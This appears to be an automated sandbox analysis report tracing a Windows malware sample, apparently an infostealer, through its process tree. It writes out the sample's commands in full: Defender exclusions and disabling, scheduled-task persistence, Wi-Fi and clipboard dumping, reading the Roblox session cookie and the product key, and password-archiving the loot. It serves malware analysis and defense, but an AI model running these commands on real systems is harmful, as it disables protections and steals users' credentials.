Token: SeDebugPrivilege	1196	powershell.exe
Token: SeDebugPrivilege	4608	powershell.exe
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeDebugPrivilege	1620	powershell.exe
Token: SeDebugPrivilege	1012	powershell.exe
Token: SeDebugPrivilege	1408	powershell.exe
Token: SeDebugPrivilege	1584	powershell.exe
Token: SeDebugPrivilege	3680	powershell.exe
Token: SeDebugPrivilege	1400	powershell.exe
Token: SeDebugPrivilege	3212	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.execmd.exesetup.exedllhost.exesetup.execmd.execmd.exescvhost.exeWScript.execmd.exeamamamsus.exe

description	pid	process	target process
PID 1112 wrote to memory of 4552	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	adb.exe
PID 1112 wrote to memory of 4552	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	adb.exe
PID 1112 wrote to memory of 4552	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	adb.exe
PID 1112 wrote to memory of 3908	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	Conhost.exe
PID 1112 wrote to memory of 3908	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	Conhost.exe
PID 1112 wrote to memory of 2280	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	dllhost.exe
PID 1112 wrote to memory of 2280	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	dllhost.exe
PID 1112 wrote to memory of 2280	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	dllhost.exe
PID 1112 wrote to memory of 2124	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	fastboot.exe
PID 1112 wrote to memory of 2124	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	fastboot.exe
PID 1112 wrote to memory of 2124	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	fastboot.exe
PID 1112 wrote to memory of 1368	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	WScript.exe
PID 1112 wrote to memory of 1368	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	WScript.exe
PID 1112 wrote to memory of 2516	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	scvhost.exe
PID 1112 wrote to memory of 2516	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	scvhost.exe
PID 3908 wrote to memory of 2912	3908	cmd.exe	amamamsus.exe
PID 3908 wrote to memory of 2912	3908	cmd.exe	amamamsus.exe
PID 1112 wrote to memory of 2344	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	setup.exe
PID 1112 wrote to memory of 2344	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	setup.exe
PID 1112 wrote to memory of 3420	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	cmd.exe
PID 1112 wrote to memory of 3420	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	cmd.exe
PID 1112 wrote to memory of 3260	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	WScript.exe
PID 1112 wrote to memory of 3260	1112	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe	WScript.exe
PID 2344 wrote to memory of 452	2344	setup.exe	setup.exe
PID 2344 wrote to memory of 452	2344	setup.exe	setup.exe
PID 2280 wrote to memory of 2036	2280	dllhost.exe	WScript.exe
PID 2280 wrote to memory of 2036	2280	dllhost.exe	WScript.exe
PID 2280 wrote to memory of 2036	2280	dllhost.exe	WScript.exe
PID 2280 wrote to memory of 1452	2280	dllhost.exe	WScript.exe
PID 2280 wrote to memory of 1452	2280	dllhost.exe	WScript.exe
PID 2280 wrote to memory of 1452	2280	dllhost.exe	WScript.exe
PID 452 wrote to memory of 4716	452	setup.exe	cmd.exe
PID 452 wrote to memory of 4716	452	setup.exe	cmd.exe
PID 452 wrote to memory of 1772	452	setup.exe	cmd.exe
PID 452 wrote to memory of 1772	452	setup.exe	cmd.exe
PID 1772 wrote to memory of 2464	1772	cmd.exe	powershell.exe
PID 1772 wrote to memory of 2464	1772	cmd.exe	powershell.exe
PID 4716 wrote to memory of 2420	4716	cmd.exe	powershell.exe
PID 4716 wrote to memory of 2420	4716	cmd.exe	powershell.exe
PID 2516 wrote to memory of 4564	2516	scvhost.exe	powershell.exe
PID 2516 wrote to memory of 4564	2516	scvhost.exe	powershell.exe
PID 1368 wrote to memory of 3504	1368	WScript.exe	cmd.exe
PID 1368 wrote to memory of 3504	1368	WScript.exe	cmd.exe
PID 3504 wrote to memory of 4488	3504	cmd.exe	amamamsus.exe
PID 3504 wrote to memory of 4488	3504	cmd.exe	amamamsus.exe
PID 2516 wrote to memory of 3688	2516	scvhost.exe	powershell.exe
PID 2516 wrote to memory of 3688	2516	scvhost.exe	powershell.exe
PID 2912 wrote to memory of 1400	2912	amamamsus.exe	schtasks.exe
PID 2912 wrote to memory of 1400	2912	amamamsus.exe	schtasks.exe
PID 2912 wrote to memory of 1832	2912	amamamsus.exe	powershell.exe
PID 2912 wrote to memory of 1832	2912	amamamsus.exe	powershell.exe
PID 2912 wrote to memory of 1012	2912	amamamsus.exe	powershell.exe
PID 2912 wrote to memory of 1012	2912	amamamsus.exe	powershell.exe
PID 2912 wrote to memory of 4608	2912	amamamsus.exe	powershell.exe
PID 2912 wrote to memory of 4608	2912	amamamsus.exe	powershell.exe
PID 2912 wrote to memory of 3212	2912	amamamsus.exe	powershell.exe
PID 2912 wrote to memory of 3212	2912	amamamsus.exe	powershell.exe
PID 2912 wrote to memory of 4056	2912	amamamsus.exe	Conhost.exe
PID 2912 wrote to memory of 4056	2912	amamamsus.exe	Conhost.exe
PID 2912 wrote to memory of 1620	2912	amamamsus.exe	powershell.exe
PID 2912 wrote to memory of 1620	2912	amamamsus.exe	powershell.exe
PID 2912 wrote to memory of 1408	2912	amamamsus.exe	powershell.exe
PID 2912 wrote to memory of 1408	2912	amamamsus.exe	powershell.exe
PID 2912 wrote to memory of 3680	2912	amamamsus.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe
"C:\Users\Admin\AppData\Local\Temp\0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1112

C:\Users\Admin\AppData\Roaming\adb.exe
"C:\Users\Admin\AppData\Roaming\adb.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bat.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:3908

C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\amamamsus.exe
"C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\amamamsus.exe"
3⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1196

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7nTzkesPDG.bat"
4⤵
PID:4920

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
5⤵
PID:6100

C:\Windows\ja-JP\RuntimeBroker.exe
"C:\Windows\ja-JP\RuntimeBroker.exe"
5⤵
PID:4456

C:\Users\Admin\AppData\Roaming\dllhost.exe
"C:\Users\Admin\AppData\Roaming\dllhost.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2280

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\1K70CMgSeGxLkKeGse1VkEk.vbe"
3⤵
- Checks computer location settings
PID:2036

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\WQrCS9t0V.bat" "
4⤵
PID:5464

C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\amamamsus.exe
"C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\amamamsus.exe"
5⤵
PID:4972

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\file.vbs"
3⤵
PID:1452

C:\Users\Admin\AppData\Roaming\fastboot.exe
"C:\Users\Admin\AppData\Roaming\fastboot.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2124

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\msg.vbe"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\WQrCS9t0V.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:3504

C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\amamamsus.exe
"C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\amamamsus.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4488

C:\Users\Admin\AppData\Roaming\scvhost.exe
"C:\Users\Admin\AppData\Roaming\scvhost.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\scvhost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'scvhost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\sgredgkrtf09weut3r435.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
PID:3904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'sgredgkrtf09weut3r435.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
PID:7000

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sgredgkrtf09weut3r435" /tr "C:\Users\Admin\AppData\Roaming\sgredgkrtf09weut3r435.exe"
3⤵
- Scheduled Task/Job: Scheduled Task
PID:4224

C:\Users\Admin\AppData\Roaming\setup.exe
"C:\Users\Admin\AppData\Roaming\setup.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2344

C:\Users\Admin\AppData\Roaming\setup.exe
"C:\Users\Admin\AppData\Roaming\setup.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\setup.exe'"
4⤵
- Suspicious use of WriteProcessMemory
PID:4716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\setup.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
4⤵
- Suspicious use of WriteProcessMemory
PID:1772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:5712

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:5792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:5760

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:5812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
4⤵
PID:5880

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
5⤵
PID:6412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
4⤵
PID:5892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:6236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:5976

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:6420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:6020

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:6452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
4⤵
PID:6028

C:\Windows\system32\netsh.exe
netsh wlan show profile
5⤵
PID:6616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
4⤵
PID:6076

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:3908

C:\Windows\system32\systeminfo.exe
systeminfo
5⤵
- Gathers system information
PID:6608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:6660

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:6744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:6768

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:6864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:6880

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:6932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:6944

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:7008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:7040

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:7116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3288"
4⤵
PID:2756

C:\Windows\system32\taskkill.exe
taskkill /F /PID 3288
5⤵
- Kills process with taskkill
PID:6248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3896"
4⤵
PID:5204

C:\Windows\system32\taskkill.exe
taskkill /F /PID 3896
5⤵
- Kills process with taskkill
PID:5144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3764"
4⤵
PID:5256

C:\Windows\system32\taskkill.exe
taskkill /F /PID 3764
5⤵
- Kills process with taskkill
PID:5872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4848"
4⤵
PID:5696

C:\Windows\system32\taskkill.exe
taskkill /F /PID 4848
5⤵
- Kills process with taskkill
PID:1384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3632"
4⤵
PID:5432

C:\Windows\system32\taskkill.exe
taskkill /F /PID 3632
5⤵
- Kills process with taskkill
PID:5640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3540"
4⤵
PID:5180

C:\Windows\system32\taskkill.exe
taskkill /F /PID 3540
5⤵
- Kills process with taskkill
PID:5212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
4⤵
PID:3680

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:4056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
PID:2168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
4⤵
PID:5368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
PID:6556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
4⤵
PID:5540

C:\Windows\system32\getmac.exe
getmac
5⤵
PID:6392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI23442\rar.exe a -r -hp"Pacha123" "C:\Users\Admin\AppData\Local\Temp\4KKiy.zip" *"
4⤵
PID:5704

C:\Users\Admin\AppData\Local\Temp\_MEI23442\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI23442\rar.exe a -r -hp"Pacha123" "C:\Users\Admin\AppData\Local\Temp\4KKiy.zip" *
5⤵
PID:6412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
4⤵
PID:6664

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
5⤵
PID:6304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
4⤵
PID:6564

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
5⤵
PID:5900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
4⤵
PID:5308

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
5⤵
PID:6900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
4⤵
PID:6884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
5⤵
PID:6988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
4⤵
PID:7012

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
5⤵
- Detects videocard installed
PID:6952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
4⤵
PID:6944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
5⤵
PID:3980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\sus.bat" "
2⤵
PID:3420

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\vbs.vbs"
2⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:3260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4008,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=4100 /prefetch:8
1⤵
PID:3540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2388

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1400

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Reference Assemblies\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Windows\SoftwareDistribution\Download\SharedFileCache\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2476

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\SoftwareDistribution\Download\SharedFileCache\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1196

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Windows\SoftwareDistribution\Download\SharedFileCache\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Windows\ja-JP\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\ja-JP\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\ja-JP\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "setups" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\setup.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:116

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "setup" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\setup.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "setups" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\setup.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Defender\de-DE\msedge.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\de-DE\msedge.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3656

C:\Windows\system32\schtasks.exe
